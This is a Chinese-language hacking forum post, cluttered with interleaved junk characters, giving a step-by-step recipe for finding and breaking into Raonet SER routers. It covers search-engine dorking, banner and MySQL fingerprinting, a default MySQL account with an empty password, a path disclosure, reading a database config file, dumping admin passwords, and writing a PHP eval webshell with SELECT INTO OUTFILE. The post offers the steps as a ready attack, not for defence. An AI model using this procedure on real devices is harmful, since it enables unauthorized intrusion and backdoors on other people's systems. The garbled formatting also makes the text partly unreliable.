寻找存在漏洞的路由器方法:8 c6 V, @. T4 x/ \, S% c6 M9 x
/ K' S8 U: g$ D! |9 g2 H7 m
1:google搜索'Raonet Subscriber Ethernet Router'3 I1 g+ }0 ~ t! `( ~$ j
- Y; {, d: @8 `2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
" W# q# f) S; ?- m( G0 N7 L) M
& c9 p7 C4 T; x3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。! ^* Z0 r4 V% T
" U* y0 |9 D9 m# W4 P3 G: P
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
8 c5 p# G% O; v' J. }8 u- C2 {
, i7 [1 W( ~0 j2 C' [4 }$ q
4 ^- Y0 B) D# k, w
8 h8 {+ _% V3 R入侵步骤:
' O4 F6 r9 t7 c7 r/ g' c5 ~7 U0 O0 p- u( @( K4 r: L: m
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php6 N: v: L, J5 h3 y: |/ i
8 c" I( R) b* g
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
# l% @1 G1 { C3 [: v3:得到密码后连接,查看GUI管理密码:
( U, p1 ^1 Z1 K E0 G# v" [use ser_5000 J1 P' p4 q: @6 E4 u- P
select id,passwd from user;
* S5 b" @# C2 I5 p; n4:通过数据库写入webshell,执行命令:, c6 M( O2 ^9 s B7 ~ f' N2 V
use mysql;. l2 B# X c0 E* J. i* [+ |
create table ok(cmd TEXT);
8 l" }* d) o6 b. Ginsert into ok values("<?php @eval($_POST[cmd])?>");2 L9 N% m2 ]6 N- z' y2 w8 y
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";# {- M F h! D1 m8 j
drop table ok;
. `1 i% L! U- D: Q* B2 K E
# R# ~ @9 @$ J& A5:连接后门shell.php ( t! U# F/ q5 O3 L, r
+ e& ]+ u4 Q2 O" V* ?- ~3 h6. 搞定!6 C3 f7 M' T* l
9 U: C* n, C2 U# B" t- `: W
|